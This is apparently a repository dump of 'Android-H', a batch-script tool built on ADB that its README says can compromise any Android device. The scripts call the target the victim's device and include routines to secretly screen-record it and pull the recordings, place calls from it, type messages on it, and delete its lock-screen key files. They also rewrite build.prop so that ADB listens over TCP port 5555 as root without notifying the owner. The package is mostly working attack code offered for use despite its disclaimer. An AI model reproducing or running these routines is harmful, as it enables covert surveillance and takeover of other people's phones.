-l | find "device product:" >nul 580 | if errorlevel 1 ( 581 | echo [ No Devices Connected Press Any Key To Back To Previous Menu ] 582 | echo. 583 | pause >nul 584 | goto menu3 585 | ) else ( 586 | echo [ Victim's Device Connected ] 587 | ) 588 | echo. 589 | echo Android Hacker Is Performing Screen Recording....... 590 | echo Recorded MP4 Will Be Saved In Victim's Device /sdcard/reco And Will Be Extracted As Recording Stops. 591 | echo To Stop Recording Any Time Press Ctrl+C Otherwise Maximum Recording Time Is Set To 30 Minutes. 592 | echo Every 3 Minutes Screen Recording Will Be Stoped By The Device And Again Started By Android Hacker. 593 | echo. 594 | adb -d shell mkdir /sdcard/reco 595 | adb -d shell screenrecord --verbose /sdcard/reco/reco1.mp4 596 | adb -d shell screenrecord --verbose /sdcard/reco/reco2.mp4 597 | adb -d shell screenrecord --verbose /sdcard/reco/reco3.mp4 598 | adb -d shell screenrecord --verbose /sdcard/reco/reco4.mp4 599 | adb -d shell screenrecord --verbose /sdcard/reco/reco5.mp4 600 | adb -d shell screenrecord --verbose /sdcard/reco/reco6.mp4 601 | adb -d shell screenrecord --verbose /sdcard/reco/reco7.mp4 602 | adb -d shell screenrecord --verbose /sdcard/reco/reco8.mp4 603 | adb -d shell screenrecord --verbose /sdcard/reco/reco9.mp4 604 | adb -d shell screenrecord --verbose /sdcard/reco/reco10.mp4 605 | goto pullreco 606 | ::------------------------------------------------------------------------------------- 607 | :pullreco 608 | echo. 609 | echo Extracting Screen Recording .mp4 From vitim's Device. 610 | echo. 611 | md Androiddata 612 | adb -d pull /sdcard/reco %cd%\Androiddata 613 | pause 614 | goto menu3 615 | ::------------------------------------------------------------------------------------------------------------screenrecord/calling 616 | :call 617 | cls 618 | echo. 619 | echo Please Enter The Phone Number On Which You Want To Call From Victim's 620 | echo. 621 | set callno="" 622 | set /p callno=[ 623 | echo. 624 | adb shell am start -a android.intent.action.CALL tel:%callno% 625 | echo. 626 | pause 627 | goto menu3 628 | 629 | ::--------------------------------------------------------------------------------------------------------------calling/enterown command 630 | rem CursorShow 631 | :enterc 632 | adb shell 633 | pause 634 | goto menu3 635 | ::---------------------------------------------------------------------------------------------------enterown command/munlock 636 | :munlock 637 | cls 638 | echo. 639 | echo ---------------------------- 640 | echo Unlock/Type Message 641 | echo ---------------------------- 642 | echo. 643 | adb devices -l | find "device product:" >nul 644 | if errorlevel 1 ( 645 | echo [ No Devices Connected "Press 4" To Back To Previous Menu ] 646 | ) else ( 647 | echo [ Victim's Device Connected ] 648 | ) 649 | echo. 650 | echo [1] Send Default Message On Victim's Device If Device Is Unlocked. 651 | echo. 652 | echo [2] Type Your Own Message If Device IS Unlocked. 653 | echo. 654 | echo [3] Unlock Victim's Device If You Know Password. 655 | echo. 656 | echo [4] Got To Previous Menu/menu3 657 | echo. 658 | set inpur="" 659 | set /p input= [-] Select an option number above: 660 | if %input%==1 goto dmsg 661 | if %input%==2 goto ymsg 662 | if %input%==3 goto entpass 663 | if %input%==4 goto menu3 664 | echo. 665 | @echo Not a valid choice Try Again 666 | pause >nul 667 | goto munlock 668 | ::--------------------------------------------- 669 | :dmsg 670 | echo. 671 | echo Hit Any To Start Typing Message 672 | pause > nul 673 | adb shell input swipe 407 1211 378 85 674 | adb shell input text "Heloooo" 675 | adb shell input keyevent 62 676 | adb shell input text "Your" 677 | adb shell input keyevent 62 678 | adb shell input text "Device" 679 | adb shell input keyevent 62 680 | adb shell input text "Is" 681 | adb shell input keyevent 62 682 | adb shell input text "Hacked" 683 | adb shell input keyevent 62 684 | adb shell input text "By" 685 | adb shell input keyevent 62 686 | adb shell input text "Android" 687 | adb shell input keyevent 62 688 | adb shell input text "Hacker" 689 | adb shell input keyevent 62 690 | adb shell input text "Author" 691 | adb shell input keyevent 62 692 | adb shell input text "Prashant" 693 | adb shell input keyevent 62 694 | adb shell input text "Thankyou" 695 | adb shell input keyevent 62 696 | adb shell input keyevent 66 697 | pause 698 | goto fun 699 | ::------------------------------------------------ 700 | :ymsg 701 | echo. 702 | echo [-] Enter Your Message To Send On Victim's Device. 703 | echo ***Note:- Type Only Alphabets And Digits Without Space Or Any Special Characters. 704 | set msg="" 705 | set /p msg=[ 706 | echo. 707 | adb shell input swipe 407 1211 378 85 708 | adb shell input text "%msg%" 709 | pause 710 | goto fun 711 | ::------------------------------------------------- 712 | :entpass 713 | echo. 714 | echo [-] Enter Password To Unlock Victim's Device 715 | echo. 716 | set pass="" 717 | set /p pass=[ 718 | adb shell input keyevent 3 719 | adb shell input swipe 407 1211 378 85 720 | adb shell input text "%pass%" 721 | adb shell input keyevent 66 722 | adb shell input keyevent 3 723 | echo. 724 | pause 725 | goto fun 726 | 727 | ::------------------------------------------------------------------------------------------------------------------munlock/Menu 4 728 | :Menu4 729 | cls 730 | echo. 731 | echo ---------------------------- 732 | echo Menu 4 733 | echo ---------------------------- 734 | echo. 735 | adb devices -l | find "device product:" >nul 736 | if errorlevel 1 ( 737 | echo [ No Devices Connected "Press 6" To Back To Previous Menu ] 738 | ) else ( 739 | echo [ Victim's Device Connected ] 740 | ) 741 | echo. 742 | echo This Menu Is Only For Rooted Android Device 743 | echo Features Won't Work If Victim's Phone Is Not Rooted 744 | echo. 745 | echo [1] Open Lock Screen 746 | echo. 747 | echo [2] Developer Defined build.prop Changes 748 | echo [3] Download, Tweak And Upload Build.prop 749 | echo. 750 | echo [4] Turn On Bluetooth 751 | echo [5] Turn Of Bluetooth 752 | echo. 753 | echo [6] Go To Menu 3 For Non Rooted Devices 754 | echo [7] Go Back To Previous Menu/Menu 2 755 | 756 | echo. 757 | set input="" 758 | set /p input= [-] Select an option number above: 759 | if %input%==1 goto lckscreen 760 | if %input%==2 goto devbuild 761 | if %input%==3 goto dtubuild 762 | if %input%==4 adb shell "su -c 'service call bluetooth 3'" & pause & goto menu4 763 | if %input%==5 adb shell "su -c 'service call bluetooth 5'" & pause & goto menu4 764 | if %input%==6 goto menu3 765 | if %input%==7 goto menu2 766 | echo. 767 | @echo Not a valid choice Try Again 768 | pause >nul 769 | goto menu4 770 | ::------------------------------------------------------------------ 771 | :lckscreen 772 | adb shell "su -c 'rm /data/system/*.key'" 773 | adb shell input keyevent 3 774 | adb shell input swipe 407 1211 378 85 775 | pause 776 | goto menu4 777 | ::-------------------------------------------------------------------------------build.prop 778 | ::best way to tweak build.prop 779 | :devbuild 780 | adb shell "su -c 'setprop persist.adb.notify 0'" 781 | adb shell "su -c 'echo "persist.adb.notify=0" >> /system/build.prop'" 782 | adb shell "su -c 'echo "service.adb.tcp.port=5555" >> /system/build.prop'" 783 | adb shell "su -c 'echo "persist.service.adb.root=1" >> /system/build.prop'" 784 | adb shell chmod 644 /system/build.prop 785 | echo. 786 | pause 787 | goto menu4 788 | ::-----------------------------------------------------------Download, Tweak And Upload Build.prop 789 | :dtubuild 790 | echo. 791 | md Androiddata 792 | adb pull /system/build.prop %cd%\Androiddata 793 | echo. 794 | echo [*] Build File Is Downloaded In Androiddata Folder. 795 | echo Now Open And Edit Build.prop Then Come Back And Any Press Any Key To Upload It To Android Device 796 | echo ***Note Carefully Edit Build.prop Because Little Mistake Can Brick Your Android Device. 797 | echo ***Do Not Rename Or Change Location Of Build.prop File 798 | echo ***Uploading Build.prop To System Folder Needs Rooted Android Device 799 | echo. 800 | echo If You Are Done Tweaking Build File Press Any Key To Upload It. 801 | pause >nul 802 | echo. 803 | adb shell "su -c 'adb push %cd%\Androiddata\build.prop /system/build.prop'" 804 | adb shell chmod 644 /system/build.prop 805 | echo. 806 | pause 807 | goto menu4 808 | ::---------------------------------------------------------------------------------------------------------build.prop 809 | :: below code is not included in the program 810 | 811 | adb sideload 812 | 813 | :: for M+ 814 | adb reboot sideload 815 | 816 | open bootloader 817 | install updates sideload 818 | full devices bsckup 819 | restore 820 | Change MAC Address 821 | Change LAN IP Address 822 | change IMEI 823 | adb root 824 | 825 | adb shell 826 | su 827 | service call bluetooth 3 828 | 829 | adb shell am start -a android.intent.action.CALL tel:1112223333 830 | adb -s shell am start -a android.intent.action.CALL -d tel:555-5555 831 | 832 | 833 | adb shell "su -c '[your command goes here]'" 834 | goto menu3 835 | service call bluetooth_manager 8 836 | adb shell "su -c 'service call bluetooth 5'" 837 | 838 | adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid [SSID] -e password_type [PASSWORD_TYPE] -e password [WIFI PASSWORD 839 | adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid [Brains] -e password_type [WPA/WPA2 PSK] -e password [9..9..6@x] 840 | 841 | 842 | down vote 843 | accepted 844 | This is possible to achieve using wpa_cli, command line interface of wpa_supplicant: 845 | 846 | # Enable WiFi 847 | adb root 848 | adb shell 849 | 850 | # Get to wpa_cli prompt 851 | wpa_cli -p /data/misc/wifi/sockets/ -i wlan0 852 | 853 | # Add new WiFi network 854 | add_network 855 | set_network 0 auth_alg OPEN 856 | set_network 0 key_mgmt WPA-PSK 857 | set_network 0 ssid "network_name" 858 | set_network 0 proto RSN 859 | set_network 0 mode 0 860 | set_network 0 psk "password" 861 | 862 | # Connect to it 863 | select_network 0 864 | enable_network 0 865 | reassociate 866 | 867 | # Check the status 868 | status 869 | 870 | :instag 871 | adb install %cd%/apk/AntiGuard.apk 872 | :startag 873 | adb shell am start -S io.kos.antiguard/.unlock 874 | :uninstag 875 | adb uninstall io.kos.antiguard` 876 | :inag 877 | adb install %cd%/apk/app-debug.apk 878 | :tiadb 879 | set /p ssid=[-] Please Enter WiFi Name : 880 | set /p past=[-] Please Enter Wifi Password Encription Type : 881 | set /p wpass=[-] Please Enter WiFi Password : 882 | :startadb 883 | adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid %ssid% -e password_type %past% -e password %wpass% 884 | 885 | ::adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid [SSID] -e password_type [PASSWORD_TYPE] -e password [WIFI PASSWORD] 886 | -------------------------------------------------------------------------------- /Android Hacker45654.exe: -------------------------------------------------------------------------------- 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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /MAF32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prashantmi/Android-H/cf02ec65c182d564a4773d56d5e1bb6f1e33a58a/MAF32.exe -------------------------------------------------------------------------------- /NOTICE.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prashantmi/Android-H/cf02ec65c182d564a4773d56d5e1bb6f1e33a58a/NOTICE.txt -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # _______________________ Android-H _______________________ 2 | 3 | 4 | # About 5 | 6 | Android Hacker is a software based on ADB(Android Debug Bridge) and can compromise any "Android Device" 7 | 8 | # Requirements 9 | 10 | * To Use This Software You Need "Developer Option, USB debugging Enabled" 11 | * To Use Android-H You Need A Password: 45654 12 | 13 | # Help needed 14 | 15 | * If you know how to write a batch script you can help me improve Android-H. Feel free to take a look at the application and suggest improvements, if you want to contribute please feel free initiate pull request 16 | * If you don't know how to code, you can help me by proposing improvements or reporting bugs. Make sure you do understand how the tool works before opening an issue. 17 | 18 | # License 19 | * Android-H is licensed under the GPL license. See [LICENSE](LICENSE) for more information. 20 | # Disclaimer 21 | 22 | * This application is issued only for knowledge purpose any actions or activities related to this application/script is solely your responsibility, the misuse of this application/script can result in criminal charges brought against the persons in question. 23 | The author/developer will not be held responsible in the event any criminal charges be brought against any individuals misusing this application/script to break the law. 24 | 25 | * Usage of Android-H to compromise any device/emulator without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. 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-------------------------------------------------------------------------------- 1 | This is an Android Application SDK(Project) 2 | Use The Project To Build The Project Or Use The APK file 3 | 4 | It Can be used to connect the android devices to the local wifi or access point through adb command 5 | 6 | adb install app/build/outputs/apk/app-debug.apk 7 | 8 | adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid [SSID] -e password_type [PASSWORD_TYPE] -e password [WIFI PASSWORD] 9 | 10 | 11 | example:- 12 | 13 | adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid Hyperlapse -e password_type WPA -e password framelapse -------------------------------------------------------------------------------- /apk/accesspoint.apk: -------------------------------------------------------------------------------- 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-------------------------------------------------------------------------------- 1 | [defaults] 2 | base_features = sparse_super,large_file,filetype,resize_inode,dir_index,ext_attr 3 | default_mntopts = acl,user_xattr 4 | enable_periodic_fsck = 0 5 | blocksize = 4096 6 | inode_size = 256 7 | inode_ratio = 16384 8 | reserved_ratio = 1.0 9 | 10 | [fs_types] 11 | ext3 = { 12 | features = has_journal 13 | } 14 | ext4 = { 15 | features = has_journal,extent,huge_file,dir_nlink,extra_isize,uninit_bg 16 | inode_size = 256 17 | } 18 | ext4dev = { 19 | features = has_journal,extent,huge_file,flex_bg,inline_data,64bit,dir_nlink,extra_isize 20 | inode_size = 256 21 | options = test_fs=1 22 | } 23 | small = { 24 | blocksize = 1024 25 | inode_size = 128 26 | inode_ratio = 4096 27 | } 28 | floppy = { 29 | blocksize = 1024 30 | inode_size = 128 31 | inode_ratio = 8192 32 | } 33 | big = { 34 | inode_ratio = 32768 35 | } 36 | huge = { 37 | inode_ratio = 65536 38 | } 39 | news = { 40 | inode_ratio = 4096 41 | } 42 | largefile = { 43 | inode_ratio = 1048576 44 | blocksize = -1 45 | } 46 | largefile4 = { 47 | inode_ratio = 4194304 48 | blocksize = -1 49 | } 50 | hurd = { 51 | blocksize = 4096 52 | inode_size = 128 53 | } 54 | -------------------------------------------------------------------------------- /mke2fs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prashantmi/Android-H/cf02ec65c182d564a4773d56d5e1bb6f1e33a58a/mke2fs.exe -------------------------------------------------------------------------------- /output.tmp: -------------------------------------------------------------------------------- 1 | * daemon not running. starting it now on port 5037 * 2 | * daemon started successfully * 3 | connected to 192.167.1.2:5555 4 | -------------------------------------------------------------------------------- /source.properties: -------------------------------------------------------------------------------- 1 | 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-------------------------------------------------------------------------------- 1 | setlocal 2 | adb kill-server 3 | adb connect %IP%:5555 | find /i "connected to" >nul 4 | if errorlevel 1 ( 5 | echo. 6 | echo No Devices Connected 7 | echo Please Refer Previous Menu ***Note*** 8 | echo. 9 | echo Press Any Key To Continue... 10 | pause >nul 11 | goto getip 12 | ) else ( 13 | cls 14 | echo Android Hacker Is connected With The Victim's Device Wirelessly. 15 | echo Now You Can Remove The USB 16 | echo. 17 | echo Press Any Key To Continue To Menu 2 18 | pause >nul 19 | goto menu2 20 | ) 21 | 22 | 23 | 24 | ::command > filename Redirect command output to a file 25 | 26 | ::command >> filename APPEND into a file 27 | 28 | ::command < filename Type a text file and pass the text to command 29 | 30 | ::commandA | commandB Pipe the output from commandA into commandB 31 | 32 | ::commandA & commandB Run commandA and then run commandB 33 | commandA && commandB Run commandA, if it succeeds then run commandB 34 | commandA || commandB Run commandA, if it fails then run commandB 35 | 36 | commandA && commandB || commandC 37 | If commandA succeeds run commandB, if it fails commandC::@echo off 38 | ::getip 39 | ::set ip="" 40 | ::set /p ip=[-] Please Enter IP Address : 41 | ::echo. 42 | ::if %ip%=="" echo Please Enter Correct Ip & pause >nul & cls & goto getip 43 | ::goto wireless 44 | 45 | :wireless 46 | setlocal 47 | ::adb kill-server 48 | ::connected 49 | echo %line1% | find/i "connected to" >nul 50 | ::echo %line1% | find/i /i "connected to" >nul 51 | 52 | if errorlevel 0 ( 53 | goto m2 ) 54 | 55 | else ( 56 | cls 57 | echo. & echo Android Hacker Is connected With The Victim's Device Wirelessly. 58 | echo Now You Can Remove The USB & echo. 59 | echo Press Any Key To Continue To Menu 2 & pause >nul 60 | ::goto menu2 61 | ) 62 | 63 | 64 | 65 | 66 | :m2 67 | 68 | ::laptop wifi off 69 | echo %line1% | find/i "unreachable host" >nul 70 | 71 | if errorlevel 1 ( 72 | goto m3 ) 73 | 74 | else( 75 | echo. & echo laptop/Desktop Wifi IS Off Or Not connected To Local Wifi/LAN 76 | echo. & echo connect laptop/Desktop To The LAN. & echo. & pause >nul 77 | echo Press Any Key To Go Back 78 | ::goto getip 79 | 80 | ) 81 | 82 | :m3 83 | :: Wrong Ip format 84 | echo %line1% | find/i "no such host" >nul 85 | 86 | if errorlevel 1 ( 87 | goto m4 ) 88 | else( 89 | echo. & echo Wrong Format IP Address... 90 | echo. & echo Please Enter IP In Given Format Example "192.168.10.10" 91 | echo. & echo Press Any Key To Continue....& pause >nul 92 | ::goto getip 93 | 94 | ) 95 | 96 | :m4 97 | 98 | ::5555 port off 99 | echo %line1% | find/i "refused it" >nul 100 | if errorlevel 1 ( 101 | 102 | 103 | goto m5 ) 104 | else ( 105 | echo. & echo Android Wireless Port Is Off 106 | echo. & echo Press Any Key To Turn On & pause >nul 107 | ::goto adbport 108 | 109 | ) 110 | 111 | 112 | :m5 113 | 114 | :: Android Wifi Off 115 | echo %line1% | find/i "faild to respond" >nul 116 | 117 | if errorlevel 1 ( 118 | goto m6 ) 119 | 120 | 121 | else ( 122 | echo. & echo Could Not connect To Given IP 123 | echo. & echo Reason Can Be... 124 | echo. & echo Android Is Not connected To Local Wifi 125 | echo. & echo Or No Device With This Ip In LAN & pause >nul 126 | ::goto getip 127 | 128 | 129 | ) 130 | 131 | 132 | :m6 133 | echo. 134 | echo Unknown Error & pause >nul 135 | :: goto getip 136 | 137 | pause >nul 138 | 139 | 140 | ::command > filename Redirect command output to a file 141 | 142 | ::command >> filename APPEND into a file 143 | 144 | ::command < filename Type a text file and pass the text to command 145 | 146 | ::commandA | commandB Pipe the output from commandA into commandB 147 | 148 | ::commandA & commandB Run commandA and then run commandB 149 | commandA && commandB Run commandA, if it succeeds then run commandB 150 | commandA || commandB Run commandA, if it fails then run commandB 151 | 152 | commandA && commandB || commandC 153 | If commandA succeeds run commandB, if it fails commandC -------------------------------------------------------------------------------- /wireless.txt: -------------------------------------------------------------------------------- 1 | ::@echo off 2 | :getip 3 | set ip="" 4 | set /p ip=[-] Please Enter IP Address : 5 | echo. 6 | if %ip%=="" echo Please Enter Correct Ip & pause >nul & cls & goto getip 7 | goto wireless 8 | 9 | :wireless 10 | setlocal 11 | adb kill-server 12 | ::connected 13 | adb connect %ip%:5555 | find /i "connected to" >nul 14 | if errorlevel 0 15 | ( 16 | cls 17 | echo. & echo Android Hacker Is connected With The Victim's Device Wirelessly. 18 | echo Now You Can Remove The USB & echo. 19 | echo Press Any Key To Continue To Menu 2 & pause >nul & goto menu2 20 | ) 21 | else 22 | ( 23 | ::laptop wifi off 24 | adb connect %IP%:5555 | find /i "unreachable host" >nul 25 | ) 26 | if errorlevel 0 27 | ( 28 | echo. & echo laptop/Desktop Wifi IS Off Or Not connected To Local Wifi/LAN 29 | echo. & echo connect laptop/Desktop To The LAN. & echo. & echo pause >nul 30 | echo Press Any Key To Go Back & goto getip 31 | ) 32 | else 33 | ( 34 | :: Wrong Ip format 35 | adb connect %IP%:5555 | find /i "no such host" >nul 36 | ) 37 | if errorlevel 0 38 | ( 39 | echo. & echo Wrong Format IP Address... 40 | echo. & echo Please Enter IP In Given Format Example "192.168.10.10" 41 | echo. & echo Press Any Key To Continue.... & goto getip 42 | ) 43 | else 44 | ( 45 | ::5555 port off 46 | adb connect %IP%:5555 | find /i "refused it" >nul 47 | if errorlevel 0 48 | ( 49 | echo. & echo Android Wireless Port Is Off 50 | echo. & echo Press Any Key To Turn On & pause >nul & goto adbport 51 | ) 52 | 53 | else 54 | ( 55 | :: Android Wifi Off 56 | adb connect %IP%:5555 | find /i "faild to respond" >nul 57 | ) 58 | if errorlevel 0 59 | ( 60 | echo. & echo Could Not connect To Given IP 61 | echo. & echo Reason Can Be... 62 | echo. & echo Android Is Not connected To Local Wifi 63 | echo. & echo Or No Device With This Ip In LAN & echo >nul & goto getip 64 | ) 65 | else 66 | ( 67 | echo. 68 | echo Unknown Error & pause >nul & goto getip 69 | ) 70 | pause >nul --------------------------------------------------------------------------------